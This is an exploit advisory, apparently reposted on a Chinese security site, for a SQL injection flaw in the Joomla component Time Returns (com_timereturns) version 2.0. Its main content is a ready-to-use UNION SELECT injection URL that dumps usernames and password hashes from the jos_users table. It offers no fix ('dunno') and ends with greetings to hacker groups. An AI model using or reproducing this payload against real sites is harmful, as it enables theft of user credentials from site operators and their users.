Joomla Component Time Returns (com_timereturns) SQL Injection Vulnerability ##
作者: kaMtiEz HdhCmsTest2cto测试数据
######################################################################
[ 软件信息]
开发者: http://HdhCmsTesttakeaweb.it/
下载 地址: http://HdhCmsTesttakeaweb.it/index.php?option=com_dms&view=category&layout=table&Itemid=13
影响版本: 2.0 or lower maybe also affected
#############################################################################################################
[缺陷文件]
http://HdhCmsTest2cto测试数据 /[kaMtiEz]/index.php?option=com_timereturns&view=timereturns&id=[num]
[ XpL ]
http://HdhCmsTest2cto测试数据 /[kaMtiEz]/index.php?option=com_timereturns&view=timereturns&id=7+union+all+select+concat_ws(0x3a,username,password),2,3,4,5,6+from+jos_users--
[ FIX ]
dunno :">
#############################################################################################################
[ Thx TO ]
[+] INDONESIANCODER - EXPLOIT-ID - MAGELANGCYBER TEAM - MALANGCYBER CREW - KILL-9
[+] Tukulesto,arianom,el-farhatz,Jundab,Ibl13Z,Ulow,s1do3L,Boebefa,Hmei7,RyanAby,AlbertWired,GonzHack,n4kuLa
[+] Lagripe-Dz,KedAns-Dz,By_aGreSiF,t0r3x,Mboys,Contrex,Gh4mb4S,jos_ali_joe,k4l0ng666,n4sss,r3m1ck,k4mpr3t0
[+] yur4kh4,xr0b0t,kido,trycyber,n4ck0,Caddy-Dz,pinpinbo dan teman2 semuanya yang saya tak bisa sebutkan satu2 :D
[ NOTE ]
[+] Halal Bihalal sukses mas dab :))
[+] Jika kau mengambil sebuah keputusan maka kau tidak boleh menyesalinya :-)
[+] Hellcome in MGL jos_ali_joe =))
[ QUOTE ]
[+] INDONESIANCODER still r0x
[+] nothing secure ..
查看更多关于Joomla Component Time Returns (com_timereturns) SQ的详细内容...